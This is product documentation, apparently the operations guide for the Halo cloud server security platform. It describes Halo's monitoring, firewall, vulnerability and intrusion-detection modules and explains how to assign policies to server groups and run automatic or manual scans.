Using Halo Security Modules and Services
Note: This section is a summary that is not required reading. Everything discussed here is described in more detail in the module-specific Halo documernts referenced below.
The capabilities of Halo to protect your server infrastructure can be grouped under several security control objectives:
- Visibility and intelligence
- Layered access control
- Security exposure management
- Compromise detection and prevention
To implement each of these broad control objectives, you'll enable one or more specific Halo security modules (for example, firewalls) to achieve both broad and deep protection for your server fleet. A given control module might contribute to more than one control objective.
For some objectives, you might need also to implement or customize one or more Halo platform services (for example, logging and alerting) to meet the objective.
Whether your goal is to meet organizational or regulatory compliance requirements, to protect valuable intellectual property, or to guard against destructive attacks on your organizational infrastructure, deploying the appropriate set of Halo modules and services can significantly strengthen the security posture of your systems and applications, regardless of architecture.
Choose the Modules and Services to Employ
Depending on the type of Halo user you are, you may have access to only a subset of these security features, or you may be able to implement them all. Implementation is in general fast and simple.
- Configuration Security Monitoring. Use this module to automatically monitor operating system and application configurations, processes, network services, privileges, and more.
Availability: Windows and Linux platforms. Implement it by creating configuration policies or cloning them from templates, and then assigning them to server groups. See the Configuration Security Monitoring Setup Guide for details.
- File Integrity Monitoring. Use this module to detect unexpected changes to the content or ownership/permissions of system binaries, configuration files, source code, and other critical files (including registry keys on Windows servers).
Availability: Windows and Linux platforms. Implement it by creating or cloning file integrity policies, running baseline scans, and assigning the baselines and policies to server groups. See the File Integrity Monitoring Setup Guide for details.
- Software Vulnerability Assessment. Use this module to scan the packages installed on your server for security vulnerabilities (NIST CVEs).
Availability: Windows and Linux platforms. Implementing it requires no action; it is always enabled. See the Software Vulnerability Assessment Setup Guide for details.
- Workload Firewall Management. Use this module to centrally manage host-based firewalls including automatic updates for when servers are added, changed or retired.
Availability: Windows and Linux platforms. Available to all Halo users. Implement it by creating firewall policies and assigning them to server groups. See the Workload Firewall Management Setup Guide for details.
- Multi-Factor Network Authentication. Use this feature of the Firewall module to implement strong authentication to dynamically provision and de-provision network access for authorized users.
Availability: Windows and Linux platform. Implement it by enabling specific users and modifying certain firewall policies. See the Multi-Factor Network Authentication Setup Guide for details.
- Server Account Management. Use this module to evaluate who has accounts on which cloud servers, what privileges they operate under, and how the accounts are being used.
Availability: Linux platforms. See the Server Account Management Setup Guide for details.
- Log-Based Intrusion Detection. Use this module to monitor system and application log files across your servers, generate alerts whenever events that could indicate compromise or attack are logged.
Availability: Windows and Linux platforms. Implement it by creating or customizing a log-based intrusion detection policy that specifies which log files to inspect and what event text or ID to alert on. See the Log-Based Intrusion Detection Setup Guide for details.
- Reporting. Use this service to conduct simple or complex parametric searches of your servers and generate reports from the results.
Availability: Windows and Linux platforms. Implementing it requires no action; it is available as long as you have Halo-protected servers. See Using Halo Reports in this document for details.
- Event logging and alerting. Use these two services to securely store events and generate real-time alerts for server creation, changes, exposures, policy violations, and more.
Availability: Windows and Linux platforms. Available to all Halo users. Implement it by flagging policy rules for logging and alerting, and by creating special events policies. See Halo Issues, Events, and Alerts for details.
Where to go from here...
Consult the above-mentioned documents for the complete instructions you need to implement and manage these Halo modules. Then continue with this Operations Guide for
- Instructions for assigning security policies to server groups and running scans of your servers.
- Information needed by site administrators for ongoing Halo configuration and administration.
- Instructions for using the Halo portal's reporting service.
Assign Security Policies to Server Groups
Once you have implemented one or more Halo modules, you can then complete the setup of any of your server groups. The final step is to assign a Halo security policy to the group. In particular, you cannot use Halo Workload Firewall Management, Configuration Security Monitoring, File Integrity Monitoring, or Log-Based Intrusion Detection until you assign the appropriate policy to the appropriate group or groups.
Do that from the Halo portal Dashboard by first choosing to edit a particular server group:
Then make the policy assignment on the group's Edit Details page:
These instructions may also be found in the individual feature documents listed in the previous section.
Note also that other server-group settings you can enter on this page include Special Events Policy and Alert Profiles (described in Halo Issues, Events, and Alerts, and Server Tag (described earlier, under Automatically Assign Servers to Groups).
Once you have set up and configured one or more Halo features, use the Halo portal on an ongoing basis to scan your servers and interpret the results.
For configuration security monitoring, file integrity monitoring software vulnerability assessment, and server account management, you can conduct scans of your servers either manually or automatically.
Configure Automatic Scans
If you are a Halo site administrator, you can enable, disable, and schedule automatic scans of your servers. Select Site Administration from the Site Administrator menu (the gears icon in the portal page header), then click the Scanner Settings tab.
For each Halo feature, select the checkbox to enable automatic scanning, and choose a scan frequency (from hourly to weekly). Select Execute scan on A start if you want each server to be initially scanned as soon as its agent starts up, instead of at a default time of day. (This is recommended, to avoid having all servers on your network being scanned at the same time.)
To turn autoscanning off, clear the Enable Automatic Scanning checkbox.
You can modify certain other scan settings on this page:
- Mark finding as Failed if the check was indeterminate. See About Indeterminate Results in Monitoring Server Configuration Security for an explanation of when you might want to enable this setting for configuration scans.
- Mark finding as Critical if CVSS score is above. Default threshold value = 5.00. See Adjust the Vulnerability Threshold in Assessing Software Vulnerabilities for an explanation of when you might want to alter this value in software vulnerability scans.
Manually Scan Selected Servers
At any time, you can manually kick off a scan of a single server, a selected set of servers, or all servers in a given server group. You might want to run a manual scan if, for example, you have just remediated a reported issue or vulnerability and you don't want to wait for the next scheduled scan to verify that the issue is no longer reported in the scan results.
On the portal Dashboard, select any server group (including the root group, if desired) and scroll or search for servers of interest. Use the checkboxes to select a single server, multiple servers, or all servers in the group. Then select Launch Scan from the Actions menu. Your scan starts immediately.
Address Detected Issues and Events
After a manual or automatic scan completes, you can interpret the resulting security issues and events by consulting the scan-results screens and event tables of the Halo portal. You may also be notified through email alerts that Halo has detected security events that warrant your attention.
On the dashboard page of the Halo portal, you can view summary results of a scan of any type conducted on any of your server groups:
To view the details of an individual server's scan results, navigate from the dashboard page to the server scan results page, showing details of any security issues that may have been uncovered during the scan:
For full information on how to view, interpret, and act upon Halo scan results, see Halo Issues, Events, and Alerts: Addressing Scan Results and Security Notifications.
// <![CDATA[ var pdfTitle="Halo Operations Guide"; var pdfURL="http://www.cloudpassage.com/document_images/ops/halo-operations.pdf"; specifyPDF(pdfTitle, pdfURL); // ]]>